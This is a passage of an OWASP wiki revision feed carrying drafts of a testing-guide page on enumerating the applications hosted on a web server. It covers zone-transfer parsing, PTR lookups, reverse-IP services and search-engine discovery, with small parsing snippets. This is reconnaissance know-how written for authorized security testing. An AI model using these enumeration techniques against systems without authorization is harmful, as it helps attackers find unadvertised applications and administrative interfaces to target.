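    """Extract host names from A/AAAA/CNAME records in AXFR output."""
    names = set()
    for line in text.splitlines():
        fields = line.split()
        if len(fields) >= 4 and fields[3] in ("A", "AAAA", "CNAME"):
            names.add(fields[0].rstrip("."))
    return sorted(names)
```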
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;DNS inverse queries&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This process is similar to the previous one, but relies on inverse (PTR) DNS records. Rather than requesting a zone transfer, try setting the record type to PTR and issue a query on the given IP address. If you are lucky, you may get back a DNS name entry. This technique relies on the existence of IP-to-symbolic-name mappings, which is not guaranteed.&lt;br /&gt;
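The name queried in a PTR lookup is the address's octets reversed under ''in-addr.arpa''; tools such as ''dig -x'' build it for you, and Python's standard library can compute it as well, as this small sketch shows:&lt;br /&gt;

```python
# Sketch: the PTR query name for an IPv4 address is the reversed
# octets under in-addr.arpa; the stdlib ipaddress module computes it.
import ipaddress

def ptr_name(ip):
    """Return the reverse-DNS (PTR) query name for `ip`."""
    return ipaddress.ip_address(ip).reverse_pointer
```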
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Web-based DNS searches&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
This kind of search is akin to a DNS zone transfer, but relies on web-based services that allow you to perform name-based searches on DNS. One such service is ''Netcraft Search DNS'', available at http://searchdns.netcraft.com/?host. You may query for a list of names belonging to your domain of choice, such as ''example.com'', and then check whether the names you obtained pertain to the target you are examining.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Reverse-IP services&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
Reverse-IP services are similar to inverse DNS queries, with the difference that you query a web-based application instead of a name server. There are a number of such services available. Since they tend to return partial (and often different) results, it is better to use multiple services to obtain a more comprehensive picture.&lt;br /&gt;
&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
''Domain tools reverse IP'': http://www.domaintools.com/reverse-ip/ &amp;lt;br&amp;gt;&lt;br /&gt;
(requires free membership) &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
''MSN search'': http://search.msn.com &amp;lt;br&amp;gt;&lt;br /&gt;
syntax: &amp;quot;ip:x.x.x.x&amp;quot; (without the quotes) &amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;br&amp;gt;&lt;br /&gt;
''Webhosting info'': http://whois.webhosting.info/ &amp;lt;br&amp;gt; &lt;br /&gt;
syntax: http://whois.webhosting.info/x.x.x.x &amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;br&amp;gt;&lt;br /&gt;
''DNSstuff'': http://www.dnsstuff.com/ &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple services available) &amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;br&amp;gt;&lt;br /&gt;
http://net-square.com/msnpawn/index.shtml &amp;lt;br&amp;gt;&lt;br /&gt;
(multiple queries on  domains and IP addresses, requires installation) &amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;br&amp;gt;&lt;br /&gt;
''tomDNS'': http://www.tomdns.net/ &amp;lt;br&amp;gt;&lt;br /&gt;
(some services are still private at the time of writing) &amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;br&amp;gt;&lt;br /&gt;
''SEOlogs.com'': http://www.seologs.com/ip-domains.html &amp;lt;br&amp;gt;&lt;br /&gt;
(reverse ip/domain lookup) &amp;lt;br&amp;gt;&lt;br /&gt;
 &amp;lt;br&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
&amp;lt;u&amp;gt;Googling&amp;lt;/u&amp;gt; &amp;lt;br&amp;gt;&lt;br /&gt;
After you have gathered as much information as you can with the previous techniques, you can rely on search engines to refine and extend your analysis. This may yield evidence of additional symbolic names belonging to your target, or of applications accessible via non-obvious URLs.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for Topic X vulnerabilities:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11824</id>
		<title>Enumerate Applications on Webserver (OTG-INFO-004)</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=Enumerate_Applications_on_Webserver_(OTG-INFO-004)&amp;diff=11824"/>
				<updated>2006-11-06T08:06:30Z</updated>
		
		<summary type="html">&lt;p&gt;Bregolin: /* Description of the Issue */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;[[http://www.owasp.org/index.php/Web_Application_Penetration_Testing_AoC Up]]&amp;lt;br&amp;gt;&lt;br /&gt;
{{Template:OWASP Testing Guide v2}}&lt;br /&gt;
&lt;br /&gt;
== Brief Summary ==&lt;br /&gt;
A common step in testing for vulnerabilities in a web presence is to find out which particular applications are hosted on a web server.&amp;lt;br/&amp;gt;&lt;br /&gt;
Many applications have known vulnerabilities and known attack strategies that can be exploited in order to gain remote control or to compromise data.&amp;lt;br&amp;gt;&lt;br /&gt;
In addition, many applications are often hosted on a given web server without being referenced from the main website: this is true of internal and/or extranet websites, which may be misconfigured or left out of date due to the perception that they are only used &amp;quot;internally&amp;quot;.&amp;lt;br/&amp;gt;&lt;br /&gt;
Furthermore, many applications use common paths for their administrative interfaces, which can be used to guess or brute-force administrative passwords.&lt;br /&gt;
&lt;br /&gt;
== Description of the Issue == &lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
With the proliferation of virtual web servers, the traditional 1:1-type relationship between an IP address and a web server is losing much of its original significance. It is not uncommon to have multiple web sites / applications whose symbolic names resolve &lt;br /&gt;
to the same IP address (and this scenario is not limited to hosting environments, but applies to ordinary corporate environments as well).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Sometimes you, as a security professional, are given a set of IP addresses (or maybe just one) as a target to test, with no other knowledge. It is arguable that this setting is more akin to a pentest-type engagement, but in any case it is expected that such an assignment would test all web applications accessible through this target (and possibly other things...). The problem is, the given IP address hosts an http service on port 80, but if you access it by specifying the IP address (which is all you know), it reports &amp;quot;No web &lt;br /&gt;
server configured at this address&amp;quot; or a similar message. Yet that system could &amp;quot;hide&amp;quot; a number of web applications, associated with unrelated symbolic (DNS) names. Obviously, the extent of your analysis is deeply affected by whether you test all of these applications, or miss some of them - because you don't notice them, or you notice only some of them.&lt;br /&gt;
Sometimes the target specification is richer – maybe you are handed a list of IP addresses and their corresponding symbolic names. Nevertheless, this list might convey only partial information, i.e., it could omit some symbolic names – and the client might not even be aware of that! (This is more likely to happen in large organizations.)&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
Other issues affecting the scope of the assessment are represented by web applications published at non-obvious URLs (e.g., http://www.example.com/some-strange-URL), which are not referenced elsewhere. This may happen either by error (due to misconfigurations), or intentionally (for example, unadvertised administrative interfaces).&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
To address these issues it is necessary to perform a web application discovery.&lt;br /&gt;
&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Black Box testing and example ==&lt;br /&gt;
'''Testing for Topic X vulnerabilities:''' &amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== Gray Box testing and example == &lt;br /&gt;
'''Testing for Topic X vulnerabilities:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Result Expected:'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&amp;lt;br&amp;gt;&lt;br /&gt;
== References ==&lt;br /&gt;
'''Whitepapers'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
'''Tools'''&amp;lt;br&amp;gt;&lt;br /&gt;
...&amp;lt;br&amp;gt;&lt;br /&gt;
&lt;br /&gt;
{{Category:OWASP Testing Project AoC}}&lt;/div&gt;</summary>
		<author><name>Bregolin</name></author>	</entry>

	</feed>